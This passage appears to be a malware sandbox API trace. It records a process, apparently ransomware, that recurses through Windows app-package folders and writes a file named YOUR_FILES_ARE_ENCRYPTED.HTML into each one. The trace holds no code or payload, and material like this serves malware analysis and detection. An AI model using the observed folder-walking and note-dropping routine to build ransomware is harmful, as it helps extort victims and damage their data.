ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0119.642] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName="..", cAlternateFileName="")) returned 1 [0119.642] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName="..", cAlternateFileName="")) returned 0 [0119.642] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.642] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0119.642] GetProcessHeap () returned 0x600000 [0119.642] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.643] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.645] CloseHandle (hObject=0x320) returned 1 [0119.645] GetProcessHeap () returned 0x600000 [0119.645] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.645] GetProcessHeap () returned 0x600000 [0119.645] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.645] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="Temp", cAlternateFileName="")) returned 1 [0119.645] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.645] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp") returned 112 [0119.645] GetProcessHeap () returned 0x600000 [0119.645] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.645] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp" [0119.645] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\*" [0119.645] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.645] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName="..", cAlternateFileName="")) returned 1 [0119.645] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a0, dwReserved1=0x6f5ea0, cFileName="..", cAlternateFileName="")) returned 0 [0119.645] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.645] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0119.646] GetProcessHeap () returned 0x600000 [0119.646] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.646] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.648] CloseHandle (hObject=0x320) returned 1 [0119.648] GetProcessHeap () returned 0x600000 [0119.648] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.648] GetProcessHeap () returned 0x600000 [0119.648] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.649] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97ed6108, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97ed6108, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97ed6108, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="Temp", cAlternateFileName="")) returned 0 [0119.649] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.649] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0119.649] GetProcessHeap () returned 0x600000 [0119.649] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.650] WriteFile (in: hFile=0x31c, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.652] CloseHandle (hObject=0x31c) returned 1 [0119.652] GetProcessHeap () returned 0x600000 [0119.652] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.652] GetProcessHeap () returned 0x600000 [0119.652] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.652] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e89cc4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e89cc4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0119.652] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.652] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData") returned 112 [0119.652] GetProcessHeap () returned 0x600000 [0119.652] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.652] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData" [0119.652] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\*" [0119.652] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e89cc4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e89cc4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.652] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e89cc4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e89cc4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 1 [0119.652] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e89cc4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e89cc4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 0 [0119.652] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.652] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0119.653] GetProcessHeap () returned 0x600000 [0119.653] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.654] WriteFile (in: hFile=0x31c, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.655] CloseHandle (hObject=0x31c) returned 1 [0119.655] GetProcessHeap () returned 0x600000 [0119.655] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.655] GetProcessHeap () returned 0x600000 [0119.655] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.656] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0119.656] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.656] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache") returned 115 [0119.656] GetProcessHeap () returned 0x600000 [0119.656] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.657] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache" [0119.657] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\*" [0119.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName=".", cAlternateFileName="")) returned 0x626778 [0119.658] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 1 [0119.658] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 0 [0119.658] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.658] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0119.658] GetProcessHeap () returned 0x600000 [0119.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.660] WriteFile (in: hFile=0x31c, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.661] CloseHandle (hObject=0x31c) returned 1 [0119.661] GetProcessHeap () returned 0x600000 [0119.661] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.661] GetProcessHeap () returned 0x600000 [0119.661] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.661] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97dcaeaa, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97dcaeaa, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97dcaeaa, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0119.661] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.661] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState") returned 115 [0119.661] GetProcessHeap () returned 0x600000 [0119.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.661] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState" [0119.661] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\*" [0119.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97dcaeaa, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97dcaeaa, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97dcaeaa, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.662] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97dcaeaa, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97dcaeaa, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97dcaeaa, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 1 [0119.662] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97dcaeaa, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97dcaeaa, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97dcaeaa, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 0 [0119.662] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.662] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: 